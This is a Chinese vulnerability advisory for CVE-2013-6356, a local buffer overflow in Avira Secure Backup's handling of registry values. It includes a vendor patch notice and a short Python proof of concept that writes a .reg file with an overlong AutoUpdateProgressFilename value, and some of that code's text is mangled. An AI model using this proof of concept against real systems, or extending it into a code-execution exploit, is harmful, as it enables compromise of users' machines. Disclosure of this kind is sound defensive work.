Avira Secure Backup本地缓冲区溢出漏洞（CVE-2013-6356）

发布日期：2013-11-18
更新日期：2013-11-19受影响系统：
AVIRA Secure Backup 1.0.0.2.3630
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 63765
CVE（CAN） ID: CVE-2013-6356Avira Secure Backup是在线存储解决方案。Avira Secure Backup 1.0.0.2.3630及其他版本在启动时从"HKEY_CURRENT_USERSoftwareAvira Secure Backup"加载注册表值"AutoUpdateDownloadFilename"及"AutoUpdateProgressFilename"，但没有进行有效的边界检查，在实现上存在缓冲区溢出漏洞，攻击者可利用此漏洞在受影响应用上下文中执行任意代码。<*来源：Julien Ahrens

链接：http://www.securityfocus.com/archive/1/529854
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！#！/usr/bin/python
file="poc.reg"junk1="xCC" * 1240poc="Windows Registry Editor Version 5.00 "
poc=poc + "[HKEY_CURRENT_USERSoftwareAvira Secure Backup] "
poc=poc + ""AutoUpdateProgressFilename"="" + junk1 + """try:
print "[*] Creating exploit file... ";
writeFile = open （file, "w"）
writeFile.write（ poc ）
writeFile.close（）
print "[*] File successfully created！";
except:
print "[！] Error while creating file！";建议：
--------------------------------------------------------------------------------
厂商补丁：AVIRA
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.avira.com/en/secure-backup-email-v1多个WordPress主题"upload-handler.php"任意文件上传漏洞Linux Kernel "kvm_main.c"本地拒绝服务漏洞相关资讯 Avira Secure Backup 本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规